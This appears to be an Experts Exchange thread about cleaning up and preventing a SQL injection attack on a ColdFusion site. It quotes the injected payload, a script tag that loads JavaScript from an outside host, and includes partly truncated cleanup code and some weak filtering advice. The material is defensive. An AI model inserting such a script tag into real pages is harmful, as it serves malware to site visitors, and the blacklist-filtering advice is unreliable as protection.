rlewis4424
asked on
I need solutions to an SQL injection attack for coldfusion pages.
Database got hit with an SQL injection attack. It's adding this line of code to some of the fields in the database.
I've started to change the forms on the site to use parameters (I should have done this to begin with). Is there anything else that I need to do to resolve this ASAP? Everything I find is for ASP. Is there a cleanup code to erase the script from all tables? Please help!!
I've started to change the forms on the site to use parameters (I should have done this to begin with). Is there anything else that I need to do to resolve this ASAP? Everything I find is for ASP. Is there a cleanup code to erase the script from all tables? Please help!!
</title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script>
You need to use <CFQUERYPARAM on all SQL operations, this will prevent all SQL injection
Since this was put in using malicious code taking advantage of your connection to SQL server from CFML it is only appropriate that you use your own CFML code to repair it. You can use CF query to get listing of all column names from your infected table. Then using CFLOOP for each column name, run an update CFQUERY that does a REPLACE(columname, '</title><script src="h ttp://jjmaoduo2.3322.org/c
And I guess you can construct one big update statement using the look and execute one massive update query instead of doing individual column updates if you prefer:
<cfset sql = "UPDATE table1 SET" />
<cfloop ...>
<cfset sql &= " #columnname# = REPLACE(#columname#, '</title><script src=""h ttp://jjmaoduo2.3322.org/c
</cfloop>
just use a counter in the loop to determine when on 2nd, 3rd, etc. columns and additionally add a "," in front to separate column updates statements. No need for a where clause since you want to clean all records and if value doesn't exist, you are just putting back same value into columnname. I would do a cfoutput of the generated sql to make sure it is parsing/looking correctly before executing against your live database.
In fact, if you want you can use the code just to create the SQL query for you that you can then execute in SQL Studio yourself allowing you to comment out certain sections at a time but not having to type in all the code to begin with if you have a lot of columns/tables affected.
<cfset sql = "UPDATE table1 SET" />
<cfloop ...>
<cfset sql &= " #columnname# = REPLACE(#columname#, '</title><script src=""h ttp://jjmaoduo2.3322.org/c
</cfloop>
just use a counter in the loop to determine when on 2nd, 3rd, etc. columns and additionally add a "," in front to separate column updates statements. No need for a where clause since you want to clean all records and if value doesn't exist, you are just putting back same value into columnname. I would do a cfoutput of the generated sql to make sure it is parsing/looking correctly before executing against your live database.
In fact, if you want you can use the code just to create the SQL query for you that you can then execute in SQL Studio yourself allowing you to comment out certain sections at a time but not having to type in all the code to begin with if you have a lot of columns/tables affected.
ASKER
Thanks for the responses! I think I pretty much know now how to clean the database up. But what about preventing this from happening in the future? what things to I need to change?
As I first said
You need to use <CFQUERYPARAM on all SQL operations, this will prevent all SQL injection
You need to use <CFQUERYPARAM on all SQL operations, this will prevent all SQL injection
ASKER
I have changed all forms to use CFQueryparam and the problem still persists.
For fields that are strictly numeric, you can check if the value being passed is numerical before storing. So use a variable that has a default value of 0 or whatever is appropriate for field, then wrap setting of variable with query string / user value with if statement checking if string is numeric.
For string fields, you can do replace statement and regular expression to look for all characters or character combinations you don't want and replace as long as field doesn't have valid entries that use those same combinations.
You could try to run values through urlencode.
For string fields, you can do replace statement and regular expression to look for all characters or character combinations you don't want and replace as long as field doesn't have valid entries that use those same combinations.
You could try to run values through urlencode.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Then simply do a find and replace using your favorite tool.